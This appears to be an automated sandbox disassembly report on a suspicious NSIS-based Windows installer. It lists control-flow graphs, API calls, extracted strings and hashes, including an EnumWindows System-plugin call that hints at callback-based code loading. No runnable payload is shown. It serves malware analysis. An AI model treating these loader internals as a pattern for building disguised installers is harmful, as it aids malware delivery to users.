                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
                                                                  • API String ID: 2295610775-917692060
                                                                  • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                  • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                                  • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                  • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 160 403db9-403dca call 406550 154->160 161 403dcf-403dd5 lstrcatW 154->161 163 403dda-403e03 call 40402a call 406059 155->163 160->161 161->163 169 403e95-403e9d call 406059 163->169 170 403e09-403e0e 163->170 176 403eab-403ed0 LoadImageW 169->176 177 403e9f-403ea6 call 4066bf 169->177 170->169 171 403e14-403e3c call 406550 170->171 171->169 178 403e3e-403e42 171->178 180 403f51-403f59 call 40140b 176->180 181 403ed2-403f02 RegisterClassW 176->181 177->176 185 403e54-403e60 lstrlenW 178->185 186 403e44-403e51 call 405f7e 178->186 193 403f63-403f6e call 40402a 180->193 194 403f5b-403f5e 180->194 182 404020 181->182 183 403f08-403f4c SystemParametersInfoW CreateWindowExW 181->183 191 404022-404029 182->191 183->180 187 403e62-403e70 lstrcmpiW 185->187 188 403e88-403e90 call 405f51 call 406682 185->188 186->185 187->188 192 403e72-403e7c GetFileAttributesW 187->192 188->169 197 403e82-403e83 call 405f9d 192->197 198 403e7e-403e80 192->198 204 403f74-403f8e ShowWindow call 406a06 193->204 205 403ff7-403fff call 4057da 193->205 194->191 197->188 198->188 198->197 212 403f90-403f95 call 406a06 204->212 213 403f9a-403fac GetClassInfoW 204->213 210 404001-404007 205->210 211 404019-40401b call 40140b 205->211 210->194 214 40400d-404014 call 40140b 210->214 211->182 212->213 217 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 213->217 218 403fae-403fbe GetClassInfoW RegisterClassW 213->218 214->194 217->191 218->217
                                                                  APIs
                                                                    • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                    • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                  • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00008001), ref: 00403DD5
                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                  • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                                  • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                                  • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 1975747703-1154611725
                                                                  • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                  • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                                  • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                  • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 231 40336f-403373 228->231 237 403163 229->237 238 403248-403256 call 403033 229->238 240 403168-40317f 237->240 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 240->242 243 403183-40318c call 4035e7 240->243 242->243 251 403192-403199 243->251 252 4032e3-4032eb call 403033 243->252 244->231 247 403261-403279 call 4035fd call 4035e7 245->247 248 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->248 247->244 275 40327f-403285 247->275 272 4032d9-4032de 248->272 273 4032ed-40331d call 4035fd call 403376 248->273 256 403215-403219 251->256 257 40319b-4031af call 40612d 251->257 252->244 262 403223-403229 256->262 263 40321b-403222 call 403033 256->263 257->262 271 4031b1-4031b8 257->271 268 403238-403240 262->268 269 40322b-403235 call 406b63 262->269 263->262 268->240 274 403246 268->274 269->268 271->262 279 4031ba-4031c1 271->279 272->231 286 403322-403325 273->286 274->238 275->244 275->248 279->262 281 4031c3-4031ca 279->281 281->262 283 4031cc-4031d3 281->283 283->262 285 4031d5-4031f5 283->285 285->244 287 4031fb-4031ff 285->287 286->244 288 40332e-40333f 286->288 289 403201-403205 287->289 290 403207-40320f 287->290 291 403341 288->291 292 403347-40334c 288->292 289->274 289->290 290->262 293 403211-403213 290->293 291->292 294 40334d-403353 292->294 293->262 294->294 295 403355-40336d call 40612d 294->295 295->231
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004030E9
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\x6yDsHJ9tr.exe,00000400), ref: 00403105
                                                                    • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
                                                                    • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 0040314E
                                                                  • GlobalAlloc.KERNEL32(00000040,00008001), ref: 00403290
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\x6yDsHJ9tr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 2803837635-3264494702
                                                                  • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                  • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                                  • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                  • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 310 4068f2 306->310 311 40673b-40677e 306->311 307->308 312 406900-406903 310->312 313 4068f4-4068fe 310->313 314 406784-406790 311->314 315 406896-40689a 311->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 320 4067d6-4067d9 317->320 321 40679e-4067c4 call 406550 317->321 324 4068b3-4068bf call 406682 318->324 325 4068a5-4068b1 call 4065c9 318->325 322 4068e2-4068f0 lstrlenW 319->322 323 4068d4-4068dd call 4066bf 319->323 329 4067db-4067e7 GetSystemDirectoryW 320->329 330 4067ec-4067ef 320->330 338 4067ca-4067d1 call 4066bf 321->338 339 40687e-406881 321->339 322->301 323->322 334 4068c4-4068ca 324->334 325->334 335 406879-40687c 329->335 336 406801-406805 330->336 337 4067f1-4067fd GetWindowsDirectoryW 330->337 334->322 340 4068cc 334->340 335->339 341 40688e-406894 call 406930 335->341 336->335 342 406807-406825 336->342 337->336 338->335 339->341 344 406883-406889 lstrcatW 339->344 340->341 341->322 346 406827-40682d 342->346 347 406839-406851 call 406a76 342->347 344->341 352 406835-406837 346->352 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 347->355 356 406868-406871 347->356 352->347 353 406873-406877 352->353 353->335 355->353 355->356 356->342 356->353
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                                  • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                  • API String ID: 4024019347-3319343437
                                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                  • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                  • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 432 4017ba-4017bb call 406930 426->432 427->432 436 4017c0-4017c4 432->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 446 4017e2-4017f4 437->446 447 4017d2-4017e0 CompareFileTime 437->447 439 401802-40181e call 406172 438->439 440 4017fc-4017fd call 40614d 438->440 448 401820-401823 439->448 449 401892-4018bb call 405707 call 403376 439->449 440->439 446->438 447->446 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 483 401869-40186a 451->483 466 402c38 461->466 465 4018d5-4018e0 CloseHandle 463->465 464->463 464->465 469 4018e6-4018e9 465->469 470 402c2f-402c32 465->470 468 402c3a-402c3e 466->468 472 4018eb-4018fc call 4066bf lstrcatW 469->472 473 4018fe-401901 call 4066bf 469->473 470->466 480 401906-40239d 472->480 473->480 484 4023a2-4023a7 480->484 485 40239d call 405ce2 480->485 483->461 486 40186c-40186d 483->486 484->468 485->484 486->450
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017B5
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017DA
                                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Call
                                                                  • API String ID: 1941528284-2520172072
                                                                  • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                  • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                                  • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                  • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 516 402806 504->516 505->504 507 4027e3-4027ee call 406253 505->507 506->496 509 402776-402784 506->509 507->496 507->504 512 40278a-40279c MultiByteToWideChar 509->512 513 40283f-40284b call 4065c9 509->513 512->516 517 40279e-4027a1 512->517 513->494 519 402809-40280c 516->519 520 4027a3-4027ae 517->520 519->513 521 40280e-402813 519->521 520->519 522 4027b0-4027d5 SetFilePointer MultiByteToWideChar 520->522 524 402850-402854 521->524 525 402815-40281a 521->525 522->520 523 4027d7 522->523 523->516 526 402871-40287d SetFilePointer 524->526 527 402856-40285a 524->527 525->524 528 40281c-40282f 525->528 526->496 529 402862-40286f 527->529 530 40285c-402860 527->530 528->496 531 402831-402837 528->531 529->496 530->526 530->529 531->501 532 40283d 531->532 532->496
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                    • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269
                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                  • String ID: 9
                                                                  • API String ID: 163830602-2366072709
                                                                  • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                  • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                                  • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                  • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                  • wsprintfW.USER32 ref: 00406A58
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME
                                                                  • API String ID: 2200240437-1106614640
                                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                  • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                  • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 552 402f28-402f3c call 402eae 549->552 555 402f86-402f8c 550->555 556 402f68-402f74 RegDeleteKeyW 550->556 552->550 558 402f3e-402f4a 552->558 555->543 556->543 558->548
                                                                  APIs
                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
